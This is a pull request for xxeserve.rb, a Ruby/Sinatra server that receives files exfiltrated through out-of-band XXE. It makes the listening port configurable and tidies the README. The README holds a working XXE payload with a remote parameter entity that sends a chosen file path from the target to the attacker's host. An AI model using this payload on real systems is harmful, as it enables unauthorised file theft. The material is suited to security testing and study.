### PR TITLE
Make port optional and update documentation

### DIFF
--- a/README.md
+++ b/README.md
@@ -5,14 +5,24 @@ described in [0].
 
 Usage:
 
+Start on default port of 443 (may need `sudo` on some systems)
+
+`ruby xxeserve.rb`
+
+Pass in port to start on
+
+`ruby xxeserve.rb 8080`
+
 Trigger the XML parser with the following XML:
 
+```
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE root [
 <!ENTITY % remote SYSTEM "http://YOURHOST:YOURPORT/xml?f=FULLPATH">
 %remote;
 %int;
 %trick;]>
+```
 
 Where YOURHOST and YOURPORT needs to be set to the host/port this app
 runs on in the URL you provide. FULLPATH needs to be set to the 
@@ -24,4 +34,4 @@ The according file will be send to the app and stored under ./files
 
 Depending on the targeted parser it may not work with all files.
 
-[0] http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf
+[0] (http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf)[http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf]

--- a/README.md
+++ b/README.md
@@ -34,4 +34,4 @@ The according file will be send to the app and stored under ./files
 
 Depending on the targeted parser it may not work with all files.
 
-[0] (http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf)[http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf]
+\[0\] [http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf](http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf)

--- a/xxeserve.rb
+++ b/xxeserve.rb
@@ -2,7 +2,7 @@
 
 require 'sinatra'
 
-set :port, 443 #set listening port here
+set :port, ARGV[0] || 443  #set listening port here
 set :bind, '0.0.0.0' #so are aren't just listening locally
 
 get "/" do


### PR DESCRIPTION
This PR allows you to pass in a port number to start the server on and updates the documentation.
